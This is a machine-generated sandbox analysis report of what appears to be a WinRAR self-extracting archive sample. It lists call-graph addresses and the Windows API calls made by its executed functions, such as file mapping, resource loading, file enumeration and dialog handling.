1e8d18 25025->25026 25027 1e8e40 25025->25027 25028 1e8d8a 25026->25028 25029 1e8d28 25026->25029 25030 1e8e66 25027->25030 25031 1e8e52 25027->25031 25050 1e8d49 25027->25050 25038 1e8167 19 API calls 25028->25038 25034 1e8d6e 25029->25034 25042 1e8d37 25029->25042 25032 1f3377 75 API calls 25030->25032 25035 1e9215 123 API calls 25031->25035 25036 1e8e7f 25032->25036 25033->25025 25037 1e8c93 25033->25037 25044 1e981a 79 API calls 25033->25044 25034->25050 25307 1e77b8 111 API calls 25034->25307 25035->25050 25039 1f3020 123 API calls 25036->25039 25037->25025 25305 1e9a3c 82 API calls 25037->25305 25041 1e8dbd 25038->25041 25039->25050 25046 1e8de6 25041->25046 25047 1e8df5 25041->25047 25041->25050 25306 1e2021 74 API calls 25042->25306 25044->25037 25308 1e7542 85 API calls 25046->25308 25309 1e9155 93 API calls __EH_prolog 25047->25309 25056 1e8f85 25050->25056 25310 1e2021 74 API calls 25050->25310 25052 1e9090 25052->25053 25055 1ea4ed 3 API calls 25052->25055 25053->25010 25054 1e903e 25286 1e9da2 25054->25286 25057 1e90eb 25055->25057 25056->25052 25056->25053 25056->25054 25285 1e9f09 SetEndOfFile 25056->25285 25057->25053 25311 1e2021 74 API calls 25057->25311 25060 1e9085 25062 1e9620 77 API calls 25060->25062 25062->25052 25063 1e90fb 25312 1e6dcb 76 API calls _wcschr 25063->25312 25066 1e16a4 25065->25066 25328 1ecee1 86 API calls 25066->25328 25070 1e9f59 25069->25070 25071 1e9f63 25070->25071 25329 1e6d0c 78 API calls 25070->25329 25071->24901 25073->24907 25079 1e1732 25074->25079 25076 1e13d6 25076->24952 25077->24950 25078->24946 25080 1e1748 25079->25080 25091 1e17a0 __InternalCxxFrameHandler 25079->25091 25081 1e1771 25080->25081 25092 1e6c36 76 API calls __vswprintf_c_l 25080->25092 25083 1e17c7 25081->25083 25088 1e178d ___std_exception_copy 25081->25088 25085 203e3e 22 API calls 25083->25085 25084 1e1767 25093 1e6ca7 75 API calls 25084->25093 25087 1e17ce 25085->25087 25087->25091 25095 1e6ca7 75 API calls 25087->25095 25088->25091 25094 1e6ca7 75 API calls 25088->25094 25091->25076 25092->25084 25093->25081 25094->25091 25095->25091 25097 1ecf4d 25096->25097 25099 1ecf54 25096->25099 25098 1e981a 79 API calls 25097->25098 25098->25099 25099->24955 25100->24957 25102 1fde78 25101->25102 25103 1ee617 53 API calls 25102->25103 25104 1fde9b 25103->25104 25105 1e4092 _swprintf 51 API calls 25104->25105 25106 1fdead 25105->25106 25107 1fd4d4 16 API calls 25106->25107 25108 1f1b7c 25107->25108 25108->24911 25110 1e19bf 25109->25110 25111 1e19bb 25109->25111 25114 1e9e80 79 API calls 25110->25114 25111->24964 25112 1e19d4 25115 1e18f6 25112->25115 25114->25112 25116 1e1908 25115->25116 25117 1e1945 25115->25117 25118 1e3b2d 101 API calls 25116->25118 25123 1e3fa3 25117->25123 25121 1e1928 25118->25121 25121->25111 25124 1e3fac 25123->25124 25125 1e3b2d 101 API calls 25124->25125 25127 1e1966 25124->25127 25140 1f0e08 25124->25140 25125->25124 25127->25121 25128 1e1e50 25127->25128 25129 1e1e5a __EH_prolog 25128->25129 25148 1e3bba 25129->25148 25131 1e1e84 25132 1e1732 78 API calls 25131->25132 25135 1e1f0b 25131->25135 25133 1e1e9b 25132->25133 25176 1e18a9 78 API calls 25133->25176 25135->25121 25136 1e1eb3 25138 1e1ebf _wcslen 25136->25138 25177 1f1b84 MultiByteToWideChar 25136->25177 25178 1e18a9 78 API calls 25138->25178 25141 1f0e0f 25140->25141 25142 1f0e2a 25141->25142 25146 1e6c31 RaiseException _com_raise_error 25141->25146 25144 1f0e3b SetThreadExecutionState 25142->25144 25147 1e6c31 RaiseException _com_raise_error 25142->25147 25144->25124 25146->25142 25147->25144 25149 1e3bc4 __EH_prolog 25148->25149 25150 1e3bda 25149->25150 25151 1e3bf6 25149->25151 25204 1e138b 74 API calls 25150->25204 25153 1e3e51 25151->25153 25156 1e3c22 25151->25156 25229 1e138b 74 API calls 25153->25229 25155 1e3be5 25155->25131 25156->25155 25179 1f3377 25156->25179 25158 1e3ca3 25159 1e3d2e 25158->25159 25175 1e3c9a 25158->25175 25207 1ed051 25158->25207 25189 1eab1a 25159->25189 25160 1e3c9f 25160->25158 25206 1e20bd 78 API calls 25160->25206 25162 1e3c8f 25205 1e138b 74 API calls 25162->25205 25163 1e3c71 25163->25158 25163->25160 25163->25162 25165 1e3d41 25169 1e3dd7 25165->25169 25170 1e3dc7 25165->25170 25213 1f3020 25169->25213 25193 1e9215 25170->25193 25173 1e3dd5 25173->25175 25222 1e2021 74 API calls 25173->25222 25223 1f2297 25175->25223 25176->25136 25177->25138 25178->25135 25180 1f338c 25179->25180 25182 1f3396 ___std_exception_copy 25179->25182 25230 1e6ca7 75 API calls 25180->25230 25183 1f341c 25182->25183 25184 1f34c6 25182->25184 25188 1f3440 _abort 25182->25188 25231 1f32aa 75 API calls 3 library calls 25183->25231 25232 20238d RaiseException 25184->25232 25187 1f34f2 25188->25163 25190 1eab28 25189->25190 25192 1eab32 25189->25192 25191 1feb38 8 API calls 25190->25191 25191->25192 25192->25165 25194 1e921f __EH_prolog 25193->25194 25233 1e7c64 25194->25233 25197 1e13ba 78 API calls 25198 1e9231 25197->25198 25236 1ed114 25198->25236 25200 1e928a 25200->25173 25202 1ed114 118 API calls 25203 1e9243 25202->25203 25203->25200 25203->25202 25245 1ed300 97 API calls __InternalCxxFrameHandler 25203->25245 25204->25155 25205->25175 25206->25158 25208 1ed084 25207->25208 25209 1ed072 25207->25209 25247 1e603a 82 API calls 25208->25247 25246 1e603a 82 API calls 25209->25246 25212 1ed07c 25212->25159 25214 1f3029 25213->25214 25215 1f3052 25213->25215 25217 1f3048 25214->25217 25218 1f303e 25214->25218 25221 1f3046 25214->25221 25215->25221 25262 1f552f 123 API calls 2 library calls 25215->25262 25261 1f624a 118 API calls 25217->25261 25248 1f6cdc 25218->25248 25221->25173 25222->25175 25224 1f22a1 25223->25224 25225 1f22ba 25224->25225 25228 1f22ce 25224->25228 25263 1f0eed 86 API calls 25225->25263 25227 1f22c1 25227->25228 25229->25155 25230->25182 25231->25188 25232->25187 25234 1eb146 GetVersionExW 25233->25234 25235 1e7c69 25234->25235 25235->25197 25242 1ed12a __InternalCxxFrameHandler 25236->25242 25237 1ed29a 25238 1ed2ce 25237->25238 25239 1ed0cb 6 API calls 25237->25239 25240 1f0e08 SetThreadExecutionState RaiseException 25238->25240 25239->25238 25243 1ed291 25240->25243 25241 1f8c8d 103 API calls 25241->25242 25242->25237 25242->25241 25242->25243 25244 1eac05 91 API calls 25242->25244 25243->25203 25244->25242 25245->25203 25246->25212 25247->25212 25249 1f359e 75 API calls 25248->25249 25250 1f6ced __InternalCxxFrameHandler 25249->25250 25250->25250 25251 1ed114 118 API calls 25250->25251 25252 1f70fe 25250->25252 25255 1f11cf 81 API calls 25250->25255 25256 1f3e0b 118 API calls 25250->25256 25257 1f0f86 88 API calls 25250->25257 25258 1f7153 118 API calls 25250->25258 25259 1f390d 98 API calls 25250->25259 25260 1f77ef 123 API calls 25250->25260 25251->25250 25253 1f5202 98 API calls 25252->25253 25254 1f710e __InternalCxxFrameHandler 25253->25254 25254->25221 25255->25250 25256->25250 25257->25250 25258->25250 25259->25250 25260->25250 25261->25221 25262->25221 25263->25227 25264->24973 25265->24973 25266->24975 25268 1e5d2a 25267->25268 25313 1e5c4b 25268->25313 25270 1e5d95 25270->24989 25271 1e5d5d 25271->25270 25318 1eb1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25271->25318 25274 1e8186 25273->25274 25275 1e8232 25274->25275 25325 1ebe5e 19 API calls __InternalCxxFrameHandler 25274->25325 25324 1f1fac CharUpperW 25275->25324 25278 1e823b 25278->24992 25280 1e7c22 25279->25280 25281 1e7c5a 25280->25281 25326 1e6e7a 74 API calls 25280->25326 25281->24997 25283 1e7c52 25327 1e138b 74 API calls 25283->25327 25285->25054 25287 1e9db3 25286->25287 25289 1e9dc2 25286->25289 25288 1e9db9 FlushFileBuffers 25287->25288 25287->25289 25288->25289 25290 1e9e3f SetFileTime 25289->25290 25290->25060 25291->24981 25292->24988 25293->24988 25294->24997 25295->24997 25296->25000 25297->25012 25298->25006 25299->25012 25301 1e98c5 GetFileType 25300->25301 25302 1e8b5a 25300->25302 25301->25302 25302->25024 25303 1e2021 74 API calls 25302->25303 25303->25022 25304->25024 25305->25025 25306->25050 25307->25050 25308->25050 25309->25050 25310->25056 25311->25063 25312->25053 25319 1e5b48 25313->25319 25316 1e5b48 2 API calls 25317 1e5c6c 25316->25317 25317->25271 25318->25271 25321 1e5b52 25319->25321 25320 1e5c3a 25320->25316 25320->25317 25321->25320 25323 1eb1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25321->25323 25323->25321 25324->25278 25325->25275 25326->25283 25327->25281 25329->25071 25331 1ea6a8 25330->25331 25332 1ea727 FindNextFileW 25331->25332 25333 1ea6c1 FindFirstFileW 25331->25333 25334 1ea732 GetLastError 25332->25334 25340 1ea709 25332->25340 25335 1ea6d0 25333->25335 25333->25340 25334->25340 25336 1ebb03 GetCurrentDirectoryW 25335->25336 25337 1ea6e0 25336->25337 25338 1ea6fe GetLastError 25337->25338 25339 1ea6e4 FindFirstFileW 25337->25339 25338->25340 25339->25338 25339->25340 25340->24923 25341->24757 25342->24763 25343->24763 25344->24766 25345->24774 25347 1e9f42 78 API calls 25346->25347 25348 1e1fe8 25347->25348 25349 1e1a04 101 API calls 25348->25349 25352 1e2005 25348->25352 25350 1e1ff5 25349->25350 25350->25352 25353 1e138b 74 API calls 25350->25353 25352->24782 25352->24783 25353->25352 25354 1e13e1 84 API calls 2 library calls 25390 1f94e0 GetClientRect 25416 1f21e0 26 API calls std::bad_exception::bad_exception 25431 1ff2e0 46 API calls __RTC_Initialize

                                                            Executed Functions

                                                            Function 001FDF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 001F0863: GetModuleHandleW.KERNEL32(kernel32), ref: 001F087C
                                                              • Part of subcall function 001F0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001F088E
                                                              • Part of subcall function 001F0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001F08BF
                                                              • Part of subcall function 001FA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 001FA655
                                                              • Part of subcall function 001FAC16: OleInitialize.OLE32(00000000), ref: 001FAC2F
                                                              • Part of subcall function 001FAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001FAC66
                                                              • Part of subcall function 001FAC16: SHGetMalloc.SHELL32(00228438), ref: 001FAC70
                                                            • GetCommandLineW.KERNEL32 ref: 001FDF5C
                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 001FDF83
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 001FDF94
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 001FDFCE
                                                              • Part of subcall function 001FDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 001FDBF4
                                                              • Part of subcall function 001FDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 001FDC30
                                                            • CloseHandle.KERNEL32(00000000), ref: 001FDFD7
                                                            • GetModuleFileNameW.KERNEL32(00000000,0023EC90,00000800), ref: 001FDFF2
                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,0023EC90), ref: 001FDFFE
                                                            • GetLocalTime.KERNEL32(?), ref: 001FE009
                                                            • _swprintf.LIBCMT ref: 001FE048
                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 001FE05A
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 001FE061
                                                            • LoadIconW.USER32(00000000,00000064), ref: 001FE078
                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 001FE0C9
                                                            • Sleep.KERNEL32(?), ref: 001FE0F7
                                                            • DeleteObject.GDI32 ref: 001FE130
                                                            • DeleteObject.GDI32(?), ref: 001FE140
                                                            • CloseHandle.KERNEL32 ref: 001FE183
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz#
                                                            • API String ID: 3049964643-4129874184
                                                            • Opcode ID: 4ef7eb564a087f9e2f8c00e54db5a5961f1f63074e05cbd3a7ceb208f6134357
                                                            • Instruction ID: f6342c8d18a9ceee97c8f44f4ba63daa318977f3421f7b0bc23c3d659b3cd347
                                                            • Opcode Fuzzy Hash: 4ef7eb564a087f9e2f8c00e54db5a5961f1f63074e05cbd3a7ceb208f6134357
                                                            • Instruction Fuzzy Hash: F861F2B1908348BBD720EBA1FC4DFBB77EDAB69704F040429FA45921A1DB749A44C762
                                                            Function 001FA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 812 1fa6c2-1fa6df FindResourceW 813 1fa7db 812->813 814 1fa6e5-1fa6f6 SizeofResource 812->814 815 1fa7dd-1fa7e1 813->815 814->813 816 1fa6fc-1fa70b LoadResource 814->816 816->813 817 1fa711-1fa71c LockResource 816->817 817->813 818 1fa722-1fa737 GlobalAlloc 817->818 819 1fa73d-1fa746 GlobalLock 818->819 820 1fa7d3-1fa7d9 818->820 821 1fa7cc-1fa7cd GlobalFree 819->821 822 1fa74c-1fa76a call 200320 CreateStreamOnHGlobal 819->822 820->815 821->820 825 1fa76c-1fa78e call 1fa626 822->825 826 1fa7c5-1fa7c6 GlobalUnlock 822->826 825->826 831 1fa790-1fa798 825->831 826->821 832 1fa79a-1fa7ae GdipCreateHBITMAPFromBitmap 831->832 833 1fa7b3-1fa7c1 831->833 832->833 834 1fa7b0 832->834 833->826 834->833
                                                            APIs
                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,001FB73D,00000066), ref: 001FA6D5
                                                            • SizeofResource.KERNEL32(00000000,?,?,?,001FB73D,00000066), ref: 001FA6EC
                                                            • LoadResource.KERNEL32(00000000,?,?,?,001FB73D,00000066), ref: 001FA703
                                                            • LockResource.KERNEL32(00000000,?,?,?,001FB73D,00000066), ref: 001FA712
                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,001FB73D,00000066), ref: 001FA72D
                                                            • GlobalLock.KERNEL32(00000000), ref: 001FA73E
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 001FA762
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 001FA7C6
                                                              • Part of subcall function 001FA626: GdipAlloc.GDIPLUS(00000010), ref: 001FA62C
                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 001FA7A7
                                                            • GlobalFree.KERNEL32(00000000), ref: 001FA7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                            • String ID: PNG
                                                            • API String ID: 211097158-364855578
                                                            • Opcode ID: d0e40302c53a0e3f6dd16af298674b9452f1762b5e2d2c2181c59c666c9eb539
                                                            • Instruction ID: 28b8d9c3a3671888f2f0f0916b0436747349083c6e3de19f5c8d8d920c0e952c
                                                            • Opcode Fuzzy Hash: d0e40302c53a0e3f6dd16af298674b9452f1762b5e2d2c2181c59c666c9eb539
                                                            • Instruction Fuzzy Hash: 5231A4B6500306BFD710AF21EC4CD6B7FB9FF94760B144628FA0992260EF36DD418AA1
                                                            Function 001EA69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1042 1ea69b-1ea6bf call 1fec50 1045 1ea727-1ea730 FindNextFileW 1042->1045 1046 1ea6c1-1ea6ce FindFirstFileW 1042->1046 1047 1ea742-1ea7ff call 1f0602 call 1ec310 call 1f15da * 3 1045->1047 1048 1ea732-1ea740 GetLastError 1045->1048 1046->1047 1049 1ea6d0-1ea6e2 call 1ebb03 1046->1049 1054 1ea804-1ea811 1047->1054 1050 1ea719-1ea722 1048->1050 1056 1ea6fe-1ea707 GetLastError 1049->1056 1057 1ea6e4-1ea6fc FindFirstFileW 1049->1057 1050->1054 1059 1ea709-1ea70c 1056->1059 1060 1ea717 1056->1060 1057->1047 1057->1056 1059->1060 1062 1ea70e-1ea711 1059->1062 1060->1050 1062->1060 1065 1ea713-1ea715 1062->1065 1065->1050
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,001EA592,000000FF,?,?), ref: 001EA6C4
                                                              • Part of subcall function 001EBB03: _wcslen.LIBCMT ref: 001EBB27
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,001EA592,000000FF,?,?), ref: 001EA6F2
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,001EA592,000000FF,?,?), ref: 001EA6FE
                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,001EA592,000000FF,?,?), ref: 001EA728
                                                            • GetLastError.KERNEL32(?,?,?,?,001EA592,000000FF,?,?), ref: 001EA734
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                            • String ID:
                                                            • API String ID: 42610566-0
                                                            • Opcode ID: cc45f9cb6290c264c1bd83b2987c96a4b2bdc2d5954ef2e38a7068a08bc406f9
                                                            • Instruction ID: 45544114660c05e5442e870f463362df01d4516d8e9f12be49abfe7f5102d981
                                                            • Opcode Fuzzy Hash: cc45f9cb6290c264c1bd83b2987c96a4b2bdc2d5954ef2e38a7068a08bc406f9
                                                            • Instruction Fuzzy Hash: E1416D72900559ABCB25DF64CC88AEEB7B9FF58350F504196E569E3200DB347E90CF90
                                                            Function 00207DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,00207DC4,?,0021C300,0000000C,00207F1B,?,00000002,00000000), ref: 00207E0F
                                                            • TerminateProcess.KERNEL32(00000000,?,00207DC4,?,0021C300,0000000C,00207F1B,?,00000002,00000000), ref: 00207E16
                                                            • ExitProcess.KERNEL32 ref: 00207E28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 7ba994bb83b8b6765886ab6e0995af6ba16f7135aabf5c77eddbac3e2fe0ca8f
                                                            • Instruction ID: ae4d8c7c7afb0b7f97d88f7dace3cebde628db0884ab99896c99e1740d98e8c0
                                                            • Opcode Fuzzy Hash: 7ba994bb83b8b6765886ab6e0995af6ba16f7135aabf5c77eddbac3e2fe0ca8f
                                                            • Instruction Fuzzy Hash: EBE04F31451244EBCF12AF10DD0D9893FAAEB24341B108454F8098A173CF36EE61CB90
                                                            Function 001E848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 02dda329db8a4bf98e380f898d39eeef4117d18f8bf499c26c8e3b2e45f97f99
                                                            • Instruction ID: edba3f2a500ede6808fc49984175104c1ede1de062f2ab7953c1159625550947
                                                            • Opcode Fuzzy Hash: 02dda329db8a4bf98e380f898d39eeef4117d18f8bf499c26c8e3b2e45f97f99
                                                            • Instruction Fuzzy Hash: EF82E970904AC5AEDF15DF65C891BFEBBB9BF15300F0841B9E84D9B192DB315A88CB60
                                                            Function 001F6CDC Relevance: .3, Instructions: 343COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: d99941aeee39f1aa15c232c92ad32f92edd573121ec980af8559ff01190a52e5
                                                            • Instruction ID: f71bdfb5620658bb9920abe25b9ee811c22b3e2d36231121ef3bf12d06d34ea9
                                                            • Opcode Fuzzy Hash: d99941aeee39f1aa15c232c92ad32f92edd573121ec980af8559ff01190a52e5
                                                            • Instruction Fuzzy Hash: D2D1A6B16083498FDB14CF28C8847ABBBE1FF99308F05456DFA899B242D774E905CB56
                                                            Function 001FB7E0 Relevance: 104.0, APIs: 48, Strings: 11, Instructions: 731windowfilesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001FB7E5
                                                              • Part of subcall function 001E1316: GetDlgItem.USER32(00000000,00003021), ref: 001E135A
                                                              • Part of subcall function 001E1316: SetWindowTextW.USER32(00000000,002135F4), ref: 001E1370
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001FB8D1
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FB8EF
                                                            • IsDialogMessageW.USER32(?,?), ref: 001FB902
                                                            • TranslateMessage.USER32(?), ref: 001FB910
                                                            • DispatchMessageW.USER32(?), ref: 001FB91A
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 001FB93D
                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 001FB960
                                                            • GetDlgItem.USER32(?,00000068), ref: 001FB983
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001FB99E
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,002135F4), ref: 001FB9B1
                                                              • Part of subcall function 001FD453: _wcschr.LIBVCRUNTIME ref: 001FD45C
                                                              • Part of subcall function 001FD453: _wcslen.LIBCMT ref: 001FD47D
                                                            • SetFocus.USER32(00000000), ref: 001FB9B8
                                                            • _swprintf.LIBCMT ref: 001FBA24
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                              • Part of subcall function 001FD4D4: GetDlgItem.USER32(00000068,0023FCB8), ref: 001FD4E8
                                                              • Part of subcall function 001FD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,001FAF07,00000001,?,?,001FB7B9,0021506C,0023FCB8,0023FCB8,00001000,00000000,00000000), ref: 001FD510
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001FD51B
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,002135F4), ref: 001FD529
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001FD53F
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 001FD559
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001FD59D
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001FD5AB
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001FD5BA
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001FD5E1
                                                              • Part of subcall function 001FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,002143F4), ref: 001FD5F0
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 001FBA68
                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 001FBA90
                                                            • GetTickCount.KERNEL32 ref: 001FBAAE
